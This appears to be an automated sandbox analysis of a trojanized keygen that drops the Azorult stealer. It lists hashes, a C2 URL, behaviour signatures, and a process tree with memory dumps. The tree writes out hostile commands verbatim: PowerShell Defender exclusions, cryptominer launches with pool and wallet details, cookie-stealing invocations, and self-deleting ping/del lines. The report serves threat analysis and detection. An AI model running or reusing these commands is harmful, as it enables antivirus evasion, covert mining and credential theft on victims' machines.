Analysis

  • max time kernel
    24s
  • max time network
    62s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    26-03-2021 08:55

General

  • Target

    S.A.D.Formatwandler.360.keygen.by.Lz0.exe

  • Size

    5.2MB

  • MD5

    d6b33a9f8b1600caa8b7ac88240e59e1

  • SHA1

    19007187f24b11f922ed5ad8717c9e06f6452654

  • SHA256

    3ee83cca83729705feabd39c7fd07a9f9f9de6a1847eea6f7ac645a60a643f85

  • SHA512

    b8df0dbe55c0ed32639bab7af0a38077338b36fb4e4832d49e542cac9838f6359d3d0764cba4fcaa90ebb486e27efa8a461fe0fe637a94d0fa626a63847fcc04

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Executes dropped EXE 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 7 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • themida 1 IoCs

    Detects Themida, Advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe
    "C:\Users\Admin\AppData\Local\Temp\S.A.D.Formatwandler.360.keygen.by.Lz0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2224
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2116
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:3900
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        3⤵
        • Executes dropped EXE
        PID:640
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        keygen-step-3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3516
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:8
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 1 -w 3000
            5⤵
            • Runs ping.exe
            PID:2860
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1168
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1364
          • C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe
            "C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:3020
            • C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe
              "C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 1 3.1616748980.605da1b4ac07e 101
              6⤵
                PID:5060
                • C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe
                  "C:\Users\Admin\AppData\Local\Temp\F0G447K8AT\multitimer.exe" 2 3.1616748980.605da1b4ac07e
                  7⤵
                    PID:2856
                    • C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe
                      "C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe" /Verysilent /subid=577
                      8⤵
                        PID:4256
                        • C:\Users\Admin\AppData\Local\Temp\is-59USJ.tmp\Setup3310.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-59USJ.tmp\Setup3310.tmp" /SL5="$30296,138429,56832,C:\Users\Admin\AppData\Local\Temp\vxvxfkota20\Setup3310.exe" /Verysilent /subid=577
                          9⤵
                            PID:4664
                            • C:\Users\Admin\AppData\Local\Temp\is-E0879.tmp\Setup.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-E0879.tmp\Setup.exe" /Verysilent
                              10⤵
                                PID:5532
                          • C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe
                            "C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe" /VERYSILENT /id=535
                            8⤵
                              PID:4204
                              • C:\Users\Admin\AppData\Local\Temp\is-6LE58.tmp\vict.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-6LE58.tmp\vict.tmp" /SL5="$60196,870426,780800,C:\Users\Admin\AppData\Local\Temp\2ycgiy5pl5c\vict.exe" /VERYSILENT /id=535
                                9⤵
                                  PID:4576
                                  • C:\Users\Admin\AppData\Local\Temp\is-SMUPT.tmp\winhost.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-SMUPT.tmp\winhost.exe" 535
                                    10⤵
                                      PID:1108
                                • C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe
                                  "C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe" /VERYSILENT
                                  8⤵
                                    PID:4984
                                    • C:\Users\Admin\AppData\Local\Temp\is-RCJCN.tmp\u4s2rqnzifk.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-RCJCN.tmp\u4s2rqnzifk.tmp" /SL5="$20250,2592217,780800,C:\Users\Admin\AppData\Local\Temp\502dt4nasgk\u4s2rqnzifk.exe" /VERYSILENT
                                      9⤵
                                        PID:4716
                                        • C:\Users\Admin\AppData\Local\Temp\is-JUVL0.tmp\winlthsth.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-JUVL0.tmp\winlthsth.exe"
                                          10⤵
                                            PID:4976
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 516
                                              11⤵
                                              • Program crash
                                              PID:5752
                                      • C:\Users\Admin\AppData\Local\Temp\4tbtvai5rzt\AwesomePoolU1.exe
                                        "C:\Users\Admin\AppData\Local\Temp\4tbtvai5rzt\AwesomePoolU1.exe"
                                        8⤵
                                          PID:4472
                                        • C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe
                                          "C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe" /silent /subid=482
                                          8⤵
                                            PID:4756
                                            • C:\Users\Admin\AppData\Local\Temp\is-6VME0.tmp\vpn.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-6VME0.tmp\vpn.tmp" /SL5="$50144,15170975,270336,C:\Users\Admin\AppData\Local\Temp\bxr1eq3utzu\vpn.exe" /silent /subid=482
                                              9⤵
                                                PID:2284
                                            • C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe
                                              "C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                              8⤵
                                                PID:4656
                                                • C:\Users\Admin\AppData\Local\Temp\is-FB9K7.tmp\IBInstaller_97039.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-FB9K7.tmp\IBInstaller_97039.tmp" /SL5="$102F4,9918015,721408,C:\Users\Admin\AppData\Local\Temp\d42vml1gtep\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                  9⤵
                                                    PID:724
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                      10⤵
                                                        PID:3716
                                                      • C:\Users\Admin\AppData\Local\Temp\is-AB2Q3.tmp\{app}\chrome_proxy.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-AB2Q3.tmp\{app}\chrome_proxy.exe"
                                                        10⤵
                                                          PID:4972
                                                    • C:\Users\Admin\AppData\Local\Temp\fyjrenhktnk\fo0g5bodxtn.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\fyjrenhktnk\fo0g5bodxtn.exe" /quiet SILENT=1 AF=756
                                                      8⤵
                                                        PID:5052
                                                      • C:\Users\Admin\AppData\Local\Temp\lch4j0ncp42\j03dwlp0p5g.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\lch4j0ncp42\j03dwlp0p5g.exe" /1-610
                                                        8⤵
                                                          PID:4860
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Bold-Dust'
                                                            9⤵
                                                              PID:4736
                                                          • C:\Users\Admin\AppData\Local\Temp\0slgfyk35fr\app.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\0slgfyk35fr\app.exe" /8-23
                                                            8⤵
                                                              PID:4944
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Autumn-Violet'
                                                                9⤵
                                                                  PID:4592
                                                              • C:\Users\Admin\AppData\Local\Temp\dj4mefarcck\berjb4e0wuv.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\dj4mefarcck\berjb4e0wuv.exe" /ustwo INSTALL
                                                                8⤵
                                                                  PID:5824
                                                          • C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe" ll
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:720
                                                            • C:\Users\Admin\AppData\Local\Temp\is-OBNE8.tmp\setups.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-OBNE8.tmp\setups.tmp" /SL5="$2020E,383902,148480,C:\Users\Admin\AppData\Local\Temp\GY3M33K5KQ\setups.exe" ll
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks computer location settings
                                                              • Loads dropped DLL
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:792
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Modifies system certificate store
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1844
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            5⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:4184
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              6⤵
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4236
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:4596
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                          4⤵
                                                            PID:5028
                                                            • C:\Users\Admin\AppData\Roaming\EE2F.tmp.exe
                                                              "C:\Users\Admin\AppData\Roaming\EE2F.tmp.exe"
                                                              5⤵
                                                                PID:4496
                                                                • C:\Windows\system32\msiexec.exe
                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                  6⤵
                                                                    PID:5180
                                                                  • C:\Windows\system32\msiexec.exe
                                                                    -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                                                                    6⤵
                                                                      PID:5340
                                                                  • C:\Users\Admin\AppData\Roaming\E46A.tmp.exe
                                                                    "C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"
                                                                    5⤵
                                                                      PID:4632
                                                                      • C:\Users\Admin\AppData\Roaming\E46A.tmp.exe
                                                                        "C:\Users\Admin\AppData\Roaming\E46A.tmp.exe"
                                                                        6⤵
                                                                          PID:5092
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                        5⤵
                                                                          PID:4684
                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                            ping 127.0.0.1
                                                                            6⤵
                                                                            • Runs ping.exe
                                                                            PID:4136
                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                                                                        4⤵
                                                                          PID:4844
                                                                          • C:\ProgramData\25660.exe
                                                                            "C:\ProgramData\25660.exe"
                                                                            5⤵
                                                                              PID:1640
                                                                            • C:\ProgramData\5479586.exe
                                                                              "C:\ProgramData\5479586.exe"
                                                                              5⤵
                                                                                PID:2936
                                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                  6⤵
                                                                                    PID:6032
                                                                                • C:\ProgramData\3351577.exe
                                                                                  "C:\ProgramData\3351577.exe"
                                                                                  5⤵
                                                                                    PID:5268
                                                                                  • C:\ProgramData\6235704.exe
                                                                                    "C:\ProgramData\6235704.exe"
                                                                                    5⤵
                                                                                      PID:5312
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                    4⤵
                                                                                      PID:5384
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        5⤵
                                                                                          PID:5876
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                  1⤵
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4408
                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  PID:4476
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4812
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  PID:4188
                                                                                • C:\Windows\system32\msiexec.exe
                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                  1⤵
                                                                                    PID:5732

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v6

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • memory/720-48-0x0000000000401000-0x000000000040C000-memory.dmp

                                                                                    Filesize

                                                                                    44KB

                                                                                  • memory/724-136-0x0000000000720000-0x0000000000721000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/792-58-0x0000000003421000-0x0000000003428000-memory.dmp

                                                                                    Filesize

                                                                                    28KB

                                                                                  • memory/792-51-0x0000000002261000-0x0000000002263000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/792-55-0x00000000032A1000-0x00000000032CC000-memory.dmp

                                                                                    Filesize

                                                                                    172KB

                                                                                  • memory/792-60-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1364-27-0x00000000004A0000-0x00000000004A1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1364-23-0x00007FFC34B10000-0x00007FFC354FC000-memory.dmp

                                                                                    Filesize

                                                                                    9.9MB

                                                                                  • memory/1364-33-0x000000001B2E0000-0x000000001B2E2000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1640-201-0x0000000000D10000-0x0000000000D11000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1640-210-0x000000000A390000-0x000000000A391000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1640-207-0x000000000A350000-0x000000000A383000-memory.dmp

                                                                                    Filesize

                                                                                    204KB

                                                                                  • memory/1640-194-0x00000000703D0000-0x0000000070ABE000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/1640-196-0x0000000000460000-0x0000000000461000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1640-209-0x0000000004D80000-0x0000000004D81000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2116-26-0x00000000031E0000-0x000000000337C000-memory.dmp

                                                                                    Filesize

                                                                                    1.6MB

                                                                                  • memory/2116-69-0x0000000000C80000-0x0000000000C81000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2116-70-0x0000000000C70000-0x0000000000C8B000-memory.dmp

                                                                                    Filesize

                                                                                    108KB

                                                                                  • memory/2116-65-0x00000000013E0000-0x00000000014CF000-memory.dmp

                                                                                    Filesize

                                                                                    956KB

                                                                                  • memory/2284-173-0x00000000037C0000-0x00000000037C1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2284-149-0x00000000032B1000-0x0000000003496000-memory.dmp

                                                                                    Filesize

                                                                                    1.9MB

                                                                                  • memory/2284-167-0x0000000003AD1000-0x0000000003ADD000-memory.dmp

                                                                                    Filesize

                                                                                    48KB

                                                                                  • memory/2284-133-0x0000000000610000-0x0000000000611000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2284-164-0x0000000003931000-0x0000000003939000-memory.dmp

                                                                                    Filesize

                                                                                    32KB

                                                                                  • memory/2284-171-0x0000000003920000-0x0000000003921000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2856-77-0x0000000002300000-0x0000000002CA0000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2856-81-0x00000000022F0000-0x00000000022F2000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/2936-199-0x0000000000450000-0x0000000000451000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2936-206-0x0000000004E30000-0x0000000004E31000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2936-198-0x00000000703D0000-0x0000000070ABE000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/2936-204-0x000000000A760000-0x000000000A761000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2936-202-0x0000000000BE0000-0x0000000000BF0000-memory.dmp

                                                                                    Filesize

                                                                                    64KB

                                                                                  • memory/3020-61-0x0000000002FF0000-0x0000000002FF2000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/3020-59-0x0000000003000000-0x00000000039A0000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/3900-29-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                    Filesize

                                                                                    5.5MB

                                                                                  • memory/3900-34-0x0000000000400000-0x0000000000983000-memory.dmp

                                                                                    Filesize

                                                                                    5.5MB

                                                                                  • memory/4204-99-0x0000000000401000-0x00000000004B7000-memory.dmp

                                                                                    Filesize

                                                                                    728KB

                                                                                  • memory/4256-96-0x0000000000401000-0x000000000040B000-memory.dmp

                                                                                    Filesize

                                                                                    40KB

                                                                                  • memory/4472-240-0x0000000000BD4000-0x0000000000BD5000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4472-113-0x00000000023A0000-0x0000000002D40000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/4472-130-0x0000000000BD0000-0x0000000000BD2000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/4576-126-0x00000000007C0000-0x00000000007C1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4592-189-0x00000000073E0000-0x00000000073E1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4592-191-0x00000000073E2000-0x00000000073E3000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4592-179-0x00000000703D0000-0x0000000070ABE000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/4592-228-0x0000000008050000-0x0000000008051000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4632-154-0x0000000003030000-0x0000000003031000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4632-157-0x0000000002BF0000-0x0000000002C35000-memory.dmp

                                                                                    Filesize

                                                                                    276KB

                                                                                  • memory/4656-132-0x0000000000401000-0x00000000004A9000-memory.dmp

                                                                                    Filesize

                                                                                    672KB

                                                                                  • memory/4664-150-0x0000000003B90000-0x0000000003B91000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-146-0x0000000003B60000-0x0000000003B61000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-152-0x0000000003BB0000-0x0000000003BB1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-151-0x0000000003BA0000-0x0000000003BA1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-139-0x0000000003B00000-0x0000000003B01000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-147-0x0000000003B70000-0x0000000003B71000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-128-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-138-0x0000000003AF0000-0x0000000003AF1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-137-0x0000000003AE0000-0x0000000003AE1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-135-0x0000000003AD0000-0x0000000003AD1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-141-0x0000000003B20000-0x0000000003B21000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-145-0x0000000003B50000-0x0000000003B51000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-140-0x0000000003B10000-0x0000000003B11000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-116-0x00000000023E1000-0x000000000240C000-memory.dmp

                                                                                    Filesize

                                                                                    172KB

                                                                                  • memory/4664-158-0x0000000003BE0000-0x0000000003BE1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-156-0x0000000003BD0000-0x0000000003BD1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-153-0x0000000003BC0000-0x0000000003BC1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-148-0x0000000003B80000-0x0000000003B81000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-143-0x0000000003B30000-0x0000000003B31000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4664-144-0x0000000003B40000-0x0000000003B41000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4716-125-0x0000000000B90000-0x0000000000B91000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-190-0x00000000052A2000-0x00000000052A3000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-178-0x00000000703D0000-0x0000000070ABE000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/4736-253-0x0000000008AE0000-0x0000000008AE1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-236-0x00000000083D0000-0x00000000083D1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-234-0x0000000008360000-0x0000000008361000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-182-0x0000000007310000-0x0000000007311000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-243-0x00000000080D0000-0x00000000080D1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-185-0x0000000007980000-0x0000000007981000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-245-0x0000000008820000-0x0000000008821000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-188-0x00000000052A0000-0x00000000052A1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4736-232-0x0000000008110000-0x0000000008111000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4756-134-0x0000000000401000-0x0000000000417000-memory.dmp

                                                                                    Filesize

                                                                                    88KB

                                                                                  • memory/4844-172-0x00007FFC31D60000-0x00007FFC3274C000-memory.dmp

                                                                                    Filesize

                                                                                    9.9MB

                                                                                  • memory/4844-187-0x0000000000B10000-0x0000000000B12000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/4844-175-0x00000000006D0000-0x00000000006D1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/4844-180-0x0000000000B00000-0x0000000000B0F000-memory.dmp

                                                                                    Filesize

                                                                                    60KB

                                                                                  • memory/4972-174-0x0000000004750000-0x0000000006D44000-memory.dmp

                                                                                    Filesize

                                                                                    38.0MB

